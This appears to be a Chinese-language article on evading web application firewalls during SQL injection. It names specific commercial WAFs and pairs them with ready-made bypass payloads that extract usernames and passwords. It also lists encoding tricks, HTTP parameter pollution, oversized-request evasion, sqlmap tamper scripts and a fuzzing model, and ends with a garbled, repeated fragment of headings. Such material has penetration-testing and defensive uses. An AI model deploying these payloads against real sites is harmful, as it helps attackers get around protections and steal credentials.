SQL注入WAF绕过技术详解<\/h1>

0x00 前言<\/h2>
本文总结了主流WAF的绕过技术，重点介绍突破WAF的思维方法和自动化绕过技术，而非简单罗列现有姿势。<\/p>

0x01 WAF类型分析<\/h2>

主流WAF分类<\/h3>

云WAF<\/strong>：<\/p>

通过CDN配置，DNS解析到CDN IP<\/li>
请求先经过云WAF检测，通过后再转发给主机<\/li> <\/ul> <\/li>

主机防护软件<\/strong>：<\/p>

预先安装在主机上<\/li>
扫描和保护主机，监听Web端口流量<\/li>
开源WAF(如mod_security、ngx-lua-waf)升级成本高<\/li> <\/ul> <\/li>

硬件防护设备<\/strong>：<\/p>

专用硬件设备进行流量清洗和拦截<\/li>
通过后再将数据包转发给主机<\/li> <\/ul> <\/li> <\/ol>
WAF规则库关系<\/h3>

百度云加速免费版基于CloudFlare<\/li>
安全宝和百度云加速规则库相似<\/li>
创宇云安全和腾讯云安全规则库相似<\/li>
腾讯云安全和门神规则库相似<\/li>
硬件WAF自身往往存在大量漏洞<\/li> <\/ul>
0x02 常见绕过技术<\/h2>
数据库特性利用<\/h3>

注释<\/strong>：<\/p>

#<\/code>、--<\/code>、\/* *\/<\/code>、;%00<\/code><\/li>
案例：\/**\/\/**\/<\/code>绕过云锁<\/li> <\/ul> <\/li>
科学记数法<\/strong>：<\/p> 1union<\/code>、1from<\/code>绕过安全宝&百度云加速&Imperva<\/li> <\/ul> <\/li> 空白字符<\/strong>：<\/p> 各数据库支持的空白字符不同： SQLite3：0A 0D 0C 09 20<\/li> MySQL5：09 0A 0B 0C 0D A0 20<\/li> PosgresSQL：0A 0D 0C 09 20<\/li> Oracle 11g：00 0A 0D 0C 09 20<\/li> MSSQL：01-20<\/li> <\/ul> <\/li> <\/ul> <\/li> 特殊符号<\/strong>：<\/p> +<\/code>、-<\/code>、`<\/code>、~<\/code>、!<\/code>、@<\/code>、.<\/code>、'<\/code>、"<\/code>、()<\/code>、{}<\/code><\/li> <\/ul> <\/li> SQL函数&关键字<\/strong>：<\/p> MySQL： union distinct<\/code>、union distinctrow<\/code><\/li> procedure analyse()<\/code>、updatexml()<\/code>、extracavalue()<\/code><\/li> 数学函数：exp()<\/code>、ceil()<\/code>、atan()<\/code>、sqrt()<\/code>等<\/li> 字符串函数：Mid()<\/code>、Substr()<\/code>、concat()<\/code>等<\/li> <\/ul> <\/li> MSSQL： IS_SRVROLEMEMBER()<\/code>、IS_MEMBER()<\/code>、HAS_DBACCESS()<\/code><\/li> convert()<\/code>、col_name()<\/code>、object_id()<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 逗号绕过<\/strong>：<\/p> limit 1 offset 0<\/code>代替limit 0,1<\/code><\/li> mid(version() from 1 for 1)<\/code>代替mid(version(),1,1)<\/code><\/li> <\/ul> <\/li> BIGINT溢出报错注入<\/strong>：<\/p> 利用MySQL BIGINT数据类型构造溢出<\/li> <\/ul> <\/li> <\/ol> 容器特性利用<\/h3> %特性<\/strong>：<\/p> ASP+IIS环境中单一百分号%<\/code>会被忽略<\/li> <\/ul> <\/li> %u特性<\/strong>：<\/p> IIS支持unicode解析，WAF可能不识别<\/li> 案例：s%u0065lect<\/code>→select<\/code><\/li> 多种编码表示同一字符：字母a：%u0000<\/code>、%u0041<\/code>、%u0061<\/code>等<\/li> 单引号：%u0027<\/code>、%u02b9<\/code>等<\/li> 空白：%u0020<\/code>、%uff00<\/code>等<\/li> <\/ul> <\/li> <\/ul> <\/li> 畸形协议&请求<\/strong>：<\/p> ASP\/ASP.NET允许application\/x-www-form-urlencoded<\/code>方式提交<\/li> PHP+Apache对协议定义不严格<\/li> 利用multipart请求边界解析差异<\/li> <\/ul> <\/li> <\/ol> 通用特性<\/h3> HTTP参数污染(HPP)<\/strong>：<\/p> 同一参数多次出现，不同容器处理不同： ASP.NET + IIS：id=1,2,3<\/code><\/li> ASP + IIS：id=1,2,3<\/code><\/li> PHP + Apache：id=3<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 双重编码<\/strong>：<\/p> 视场景而定，包括： unencode、base64、json、binary、querystring、htmlencode、unicode、php serialize<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 0x03 针对性绕过案例<\/h2> 阿里云盾绕过<\/h3> 自定义变量绕过<\/strong>：<\/p> id=<\/span>1<\/span>|@<\/span>pwd:=<\/span>(select<\/span> username from<\/span> users where<\/span> id=<\/span>4<\/span>)\/*ddd*\/<\/span>union<\/span>\/*ddd*\/<\/span>select<\/span> null<\/span>,@<\/span>pwd <\/span><\/span><\/code><\/pre><\/li> 科学计数法<\/strong>：<\/p> 1<\/span>' union\/*!23000select*\/user,password from users%23 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 腾讯云安全绕过<\/h3> 推理绕过<\/strong>： 1<\/span>' union\/*!50000select%0aall*\/username from users%23 <\/span><\/span><\/span>1'<\/span> union<\/span>\/*!50000select%0adistinct*\/<\/span>username from<\/span> users%<\/span>23<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 云锁绕过<\/h3> 超长注释<\/strong>：<\/p> \/*666666...(超长字符串)...666666*\/<\/span> <\/span><\/span><\/code><\/pre><\/li> 数据包长度绕过<\/strong>：<\/p> 超过2329字节时不检测<\/li> <\/ul> <\/li> <\/ol> 安全狗绕过<\/h3> 超长查询字符串<\/strong>：导致WAF宕机，Service Unavailable<\/li> <\/ul> <\/li> <\/ol> Emoji绕过<\/h3> 愤怒脸Emoji<\/strong>： %F0%9F%98%A0<\/code>插入到%23<\/code>与%0A<\/code>之间<\/li> ASCII码超过127的字符可能导致WAF引擎无法检测<\/li> <\/ul> <\/li> <\/ol> 0x04 自动化Bypass技术<\/h2> SQLMap Tamper脚本<\/h3> 常用脚本<\/strong>： apostrophemask.py<\/code>：UTF-8全角字符替换单引号<\/li> base64encode.py<\/code>：Base64编码<\/li> between.py<\/code>：用NOT BETWEEN<\/code>和BETWEEN<\/code>替换运算符<\/li> concat2concatws.py<\/code>：函数替换<\/li> greatest.py<\/code>：用GREATEST<\/code>函数替换大于号<\/li> space2comment.py<\/code>：用\/**\/<\/code>替换空格<\/li> versionedkeywords.py<\/code>：用MySQL注释包围关键字<\/li> <\/ul> <\/li> <\/ol> 系统化Fuzz方法<\/h3> 有毒标识模型<\/strong>：<\/p> 将SQL关键字视为"位"<\/li> 在"位"的两边插入各种符号(注释、运算符等)<\/li> 计算公式：Factor[((x^n)*4 + x*y)*m]<\/code> x：有毒标识<\/li> n：位数<\/li> y：数据库语法糖<\/li> m：编码转换<\/li> <\/ul> <\/li> <\/ul> <\/li> 传输过程测试点<\/strong>：<\/p> 中间件特性\/缺陷<\/li> 特定条件下的WAF欺骗<\/li> <\/ul> <\/li> <\/ol> 0x05 总结<\/h2> WAF绕过核心思想<\/strong>：<\/p> 理解WAF工作原理<\/li> 掌握数据库和容器特性<\/li> 灵活组合各种绕过技术<\/li> 注重细节和推理<\/li> <\/ul> <\/li> 未来方向<\/strong>：<\/p> 文件上传WAF绕过<\/li> Webshell防御绕过<\/li> 权限提升WAF绕过<\/li> <\/ul> <\/li> <\/ol> 通过系统化的测试方法和不断积累的绕过技术，可以有效突破主流WAF的防护。关键在于理解WAF的检测机制，并针对性地构造绕过Payload。<\/p>

SQL注入WAF绕过技术详解<\/h1>

0x00 前言<\/h2> 本文总结了主流WAF的绕过技术，重点介绍突破WAF的思维方法和自动化绕过技术，而非简单罗列现有姿势。<\/p>

0x01 WAF类型分析<\/h2>

0x02 常见绕过技术<\/h2>

0x03 针对性绕过案例<\/h2>

0x04 自动化Bypass技术<\/h2>

0x00 前言<\/h2>
本文总结了主流WAF的绕过技术，重点介绍突破WAF的思维方法和自动化绕过技术，而非简单罗列现有姿势。<\/p>